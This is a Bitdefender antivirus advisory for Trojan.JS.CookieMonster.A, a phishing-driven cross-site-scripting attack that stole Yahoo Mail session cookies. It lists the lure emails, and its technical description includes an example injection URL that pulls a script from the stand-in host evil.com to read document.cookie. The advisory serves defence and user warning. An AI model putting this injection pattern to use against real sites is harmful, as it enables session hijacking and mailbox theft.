United Kingdom
  • UK Support
  • My Account
  • Renewal Centre

Bitdefender®

  • Home
  • Home Users
  • Small Business
  • Corporate Business
  • ISPs
  • News
  • About Us
  • Partners
  • Home
  • Defense Center
  • Virus Information for - Trojan.JS.CookieMonster.A
BitDefender Products
  • Home Products
  • BitDefender for your Business
About BitDefender
  • About Us
  • Company Overview

Trojan.JS.CookieMonster.A

Spreading: medium
Damage: low
Size: ~50 bytes
Discovered: 2007 Nov 28

SYMPTOMS:

The user receives a mail on yahoo with the subject line containing "shell" or "c99" (for example "wtf is c99shell" , "a shell written in php??" or "look what I found, shell") and the body containing for example: "check this c99 russian php shell script"
Another case is when mail seems to be from hi5.com with a legitimate subject like "some_name_here has sent you a hi5 Friend Request", where the user is prompted to click a link to accept his new friend, link which is not pointing to hi5.com.

TECHNICAL DESCRIPTION:

If the user clicks that link from webmail he will be redirected to a page which is exploited using a "cross site scripting" or a "html injection" vulnerability that had the effect of executing the contained javascript in the security context of Yahoo, javascript which steal the user cookies used for yahoo mail.
The vulnerability affects the yahoo search engine so that browsers visiting the malicious page try to open:
http://search.yahoo.com/bin/search?p=[...http://evil.com/script.js...]
The script.js is executed and this script calls document.cookie to get user cookies and to save them.
Those cookies help that spammer to hijack that yahoo session and get into user mail account where he can harvest the contacts from user address book and make more spam or he can read user mails even the user has signed out.

Removal instructions:

Delete those mails described in "Symptoms" and change your password immediately!

ANALYZED BY:

Sorin Ciorceri, virus researcher

© 2010 BitDefender

  • Site Map
  • Legal Terms
  • Site Feedback
  • Global Sites
  • Privacy Policy

For Home Users

  • BitDefender® Total Security 2011
  • BitDefender® Internet Security 2011
  • BitDefender® Antivirus Pro 2011
  • BitDefender 2011 Product Comparison

For Small Business

  • For Small Business
  • BitDefender® Small Business Security for Desktops and File Servers
  • BitDefender® Small Business Security for Desktops, File Servers, and Exchange

News

  • BitDefender Finds IT Security Employees Likely to Disclose Sensitive Information on Social Networks
  • BitDefender Internet Security 2010 Receives Esteemed AV-Test Certification
  • BitDefender launches Total Security 2011 today to offer consumers a simplified and enhanced way to safeguard their online world

Tools & Resources

  • Free Online Virus Scanner
  • Renew Product Licence
  • Download Trial Versions
  • Download Datasheets